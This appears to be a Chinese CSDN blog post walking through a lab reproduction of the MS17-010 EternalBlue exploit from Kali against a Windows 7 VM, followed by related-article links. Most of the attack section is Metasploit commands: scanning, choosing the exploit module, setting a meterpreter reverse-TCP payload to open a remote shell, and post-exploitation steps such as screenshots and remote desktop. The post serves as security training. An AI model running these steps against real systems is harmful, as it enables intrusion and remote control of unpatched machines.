002-MS17-010 永恒之蓝 445端口

已于 2024-09-03 20:35:29 修改
阅读量949 收藏 5
点赞数 20
分类专栏: Security 文章标签: 安全
于 2024-08-30 23:40:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57017823/article/details/141724973
版权

基础设施

漏洞名:永恒之蓝 

利用端口:445

软件:VMware17.5.1 

攻击机:kali  192.168.2.128

靶机:win7 192.168.2.6

前提:

两机能互相ping通

内网渗透流程:

1)前期交互

确定目标,与kali同一个局域网的主机

查看网络配置

kali

ifconfig

win7

ipconfig

kali网络配置

win7网络配置

互相ping通

2)情报收集

nmap(上帝之眼)扫描

kali (192.168.2.128)

需要进入root权限,才好操作命令,否则有些命令会有问题

sudo su

扫描网段内的存活ip和端口开放情况

┌──(root💀kali)-[/home/kali]
└─# nmap -T4 -A -v -Pn 192.168.2.0/24

可以看到,会扫描整个网段的ip,发现445端口可以利用,win7的IP为2.6

也可以看到windows(被攻击机)的系统

3)威胁建模

根据情报收集,发现win7+445,绝配,可以利用ms17-010永恒之蓝的漏洞

4)漏洞分析

进入msfconsole的终端(msf,大多数人会直接说成是美少妇,所以,就这样)

┌──(root💀kali)-[/home/kali]
└─# msfconsole

查找ms17-010渗透攻击模块

msf6 > search ms17-010

利用测试接口探查主机是否存在永恒之蓝漏洞

        可以直接用数字来代表后面的数字,不用打那么多东西

msf6 > use 3

        

查看要配置的参数

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

        required是要求的意思,有yes就是要写的意思

        

需要配置的参数

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.2.6

        win7,被攻击的主机为192.168.2.6,rhost为目标主机,rport是目标主机的端口号,

        再查看一下参数是否配置好了

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

        启动

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

5)渗透攻击

知道有漏洞后,输入use 0进入攻击接口

use 0

再查看一番参数

show options

发现目标主机要设置

、并且因为上面显示没有payload,所以也要配置,把攻击机端口lport也配了吧

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.2.128

set lport 5555

show options

        lport这个没啥大的要求,设置得大点就好,但是也别是8080,8081,21,23这些端口,这些是别的程序要用的

然后,启动

run

这两个都是成功得标志

6)后渗透利用

        攻击

        1.进入对方shell

shell

        2.改变编码方式

C:\Windows\system32>chcp 65001

        3.退出win模式

ctrl+C,然后输入y,回车就OK了

        4.桌面截图

screenshot

        5.查看权限

getuid

        6.远程登录

        这个不是很推荐,因为你在kaili登上后,win7就会退出来,重新登录进去,所以就会打草惊蛇了,但是,也i写上去吧,注意:登陆win7的账号得是win7已有得账号。

        192.168.2.6是win7的IP地址

rdesktop 192.168.2.6

7)报告

        现在就是形成文档阶段的工作了,告诉客户漏洞利用得地方,漏洞的危害,造成的影响以及修复方法,像这篇的,修复方法就有升级系统或者给系统打补丁。

        好困了,后续如果有补充的话会看看吧,可能也会整理一些metasploit的一些攻击命令!

Metasploit 渗透攻击模块解释


0 auxiliary/admin/smb/ms17_010_command // 扫描 445 在线主机,直接执行命令,需要漏洞主机的用户名和密码参数
1 auxiliary/scanner/smb/smb_ms17_010 // 永恒之蓝扫描模块,扫描某个网段
内是否存在 ms17_010 漏洞
2 exploit/windows/smb/ms17_010_eternalblue // 永恒之蓝漏洞利用/攻击模块3 exploit/windows/smb/smb_doublepulsar_rce //SMB 后 门 , 用 于 利 用
DoublePulsar 漏洞实现 SMB 远程代码执行
4 exploit/windows/smb/ms17_010_psexec //直接利用获得 meterpreter 会话,
需要提供用户名和密码参数

余着了......

AA小菜鸡
关注
专栏目录
永恒之蓝漏洞(开放445端口,关闭防火墙)
weixin_48626638的博客
06-23 1万+
小白学了一点简单的永恒之蓝,做了点笔记,感觉挺详细,希望能帮助到小伙伴们,大佬勿喷哦,有不足的地方希望多多指教 实验目的 本次实验主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。 实验原理 永恒之蓝是在Windows的SMB服务处理SMB v1 请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒
永恒之蓝445端口方法
实践求真知
11-22 1万+
第1步:在运行中输入“secpol.msc”,进入IP安全策略设置界面。   第2步:创建IP安全 策略。   第3步:点击 下一步。   第4步:命名IP安全策略,然后点击 下一步。   第5步:“激活默认响应规则”不要勾上,直接下一步。    第6步:点击完成。   第7步:完成IP安全策略的雏形,然后双击该安全策略。   第8步:去勾选 使用“添加向导”点击 添加
避免永恒之蓝病毒,关闭445等危险端口
02-01
避免永恒之蓝病毒,关闭445等危险端口。修改文件后缀为bat,右键以管理员身份运行即可。
利用139/445端口思路——永恒之蓝
jammny
05-30 9957
前言 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 复现环境: 攻击机:Linux kali2020.2(IP:192.168.23.130) 靶机:Windows 7 X64 (IP:192.168.232.136) 1.目标扫描 这里跳过发现主机过程,用nma..
关闭445端口方法(解决永恒之蓝病毒)
m0_37876242的博客
04-10 5741
计算机被永恒之蓝感染后会出一些不明所以的问题,我电脑上不定时蓝屏,同事电脑上也是,网上搜索了解决方法,包括以下几种: 1)使用360杀毒,记得用最新的版本。 2)自己下windows对应补丁。 3)关闭445端口。 ------------------------------------------------------- 注意:(1)关闭了445端口要重启后才会...
ms17-010 (永恒之蓝)漏洞复现及利用+Wireshark抓包分析
7Riven's blog
12-03 5806
1.实验环境 攻击机:Kali 1)攻击工具:msf 2)分析工具:wireshark 3)IP地址:192.168.109.154(自动获取,NAT模式) 靶 机:Windows7 1)版本 2)开启网络共享(SMB协议) 3)关闭防火墙 4)IP地址:192.168.109.132(自动获取,NAT模式) 2.测试攻击机与靶机的连通性 3.数据库配置...
MS17-010永恒之蓝漏洞原理及复现(学习中,未完善)
chenbx163的博客
08-02 235
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。设置被攻击IP地址后,并执行,然后找到蓝屏命令use0(其他电脑不一定,根据英文选择)并使用。一、什么是永恒之蓝
网络安全 基础之 Windows漏洞复现 (MS17-010永恒之蓝
weixin_60888404的博客
06-01 2402
Windows经典漏洞 永恒之蓝复现
漏洞复现-永恒之蓝MS17-010
qq_60848021的博客
09-19 3060
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
MS17-010永恒之蓝)漏洞分析与复现
lulu001128的博客
12-01 1408
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
445端口漏洞溢出工具
08-04
445端口漏洞溢出工具来自于互联网,使用时请自行检测,杀毒!
利用MS08067漏洞扫描445断口主机入侵(工具)
05-17
利用MS08067漏洞扫描445断口主机入侵(工具)
445端口的简单利用
热门推荐
FNjoker的博客
07-22 1万+
445端口的简单利用 前期准备 1.windows10主机一台 2.kali虚拟机一台 3.win7虚拟机一台 4.CobaltStrike4.0 5.将win7虚拟机的445端口开放 简单思路说明 本次实验的目的就是测试一下在靶机开了445端口的情况下如何利用。 实验的思路是在测试到对方主机445端口开放的情况下,利用ipc$建立连接,之后将后门程序上传上去。 实验开始 在win10上输入命令:telnet 192.168.137.129 445 测试一下靶机的445端口的开放情况。 在通的情况下输入如下
永恒之蓝445 拿下服务器
hussu的博客
03-10 5994
上文提到内网渗透的时候发现服务器开启了445 接口 目标系统windows server 2008R2 x64 首先ping目标ip,连接通畅 使用service postgresql restart开启postgresql数据库 msfdb init初始化msf框架 msfconsole 打开msf控制台 msf框架db_nmap扫描端口得知目标开启了445端口,445为高危漏洞 ,可能存在永恒之蓝漏洞 search ms17永恒之蓝编号)查找auxiliary验证payload 验证表明有很大几
永恒之蓝漏洞原理 445_新代码漏洞“永恒之黑”该如何警惕?
weixin_39607836的博客
11-30 566
中科天齐公司是在中科院计算技术研究所的大力推动下,以中科院计算所国际领先的自主研究成果“软件代码漏洞检测修复平台(Wukong悟空)”为基础组建的高新技术企业。北京时间3月12日,针对最新披露的SMB远程代码执行漏洞(CVE-2020-0796),微软官方发布了针对Windows 10/Server禁用SMBv3(SMB 3.1.1版本)协议压缩的安全指南公告,旨在缓解该漏洞所造成的威胁。随即...
445端口漏洞利用
weixin_41489908的博客
07-23 5634
给小时候的自己道个歉,很抱歉,没有活成那时期待的模样。。。 ---- 网易云热评 小受:win7 192.168.1.129 小攻:XP 192.168.1.139 一、打开netscan 1、输入起始地址和结束地址,因为知道小受ip,所以直接指定192.168.1.129 2、设置线程50 3、设置超时时间 4、扫描开放的445端口 5、点击start开始扫描 6、该软件同目录有一个密码字典和用户名字典,可以自己生成然后替换 7、成功获取用户名和密码 ...
永恒之蓝(MS17-010)
最新发布
人们并不感谢罗辑
08-06 1052
SMB协议SMB是一个协议服务器信息块,它是一个客户机/服务器,请求/响应协议,通过SMB协议可以在计算机间共享文件,命名管道等资源,电脑上网上邻居就是靠SMB实现的;
永恒之蓝漏洞
ZXT02的博客
12-21 1208
仅限学习使用!!!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值